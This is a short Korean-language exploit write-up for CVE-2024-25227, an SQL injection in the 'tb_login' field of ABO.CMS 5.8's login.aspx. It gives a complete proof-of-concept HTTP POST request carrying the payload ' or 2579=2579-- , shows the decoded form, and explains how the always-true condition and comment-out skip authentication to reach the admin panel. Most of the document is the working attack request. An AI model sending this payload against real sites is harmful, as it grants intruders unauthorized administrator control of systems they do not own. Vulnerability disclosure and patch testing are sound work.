
ABO.CMS 5.8용 SQL 인젝션 익스플로잇으로, tb_login 매개변수를 통해 인증을 우회하여 인증되지 않은 관리자 패널 접근을 허용합니다. PoC HTTP 요청과 페이로드가 포함되어 있습니다.
CVE-2024-25227 익스플로잇
CVE-2024-25227은 ABO.CMS 5.8에서 "tb_login" 파라미터에서 발견된 SQLi 취약점입니다.
POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+
페이로드는 tb_login=27872164'%20or%202579%3d2579--%20이며, URL 인코딩을 제거하면 다음과 같습니다: 27872164' or 2579=2579--
페이로드가 포함된 수정된 요청을 통해 백엔드에 지시하는 것은 다음과 같습니다: 플레이스홀더 "27872164'" 는 항상 참으로 평가되는 조건 ("2579=2579") 과 결합되고, 쿼리의 나머지 부분을 주석 처리하기 위해 "--" 를 사용하여 수정된 쿼리가 주입되도록 합니다.
이를 통해 "tb_login" 필드와 관련된 모든 인증 검사를 효과적으로 우회하여 인증되지 않은 관리자 권한으로 제어판에 접근할 수 있습니다.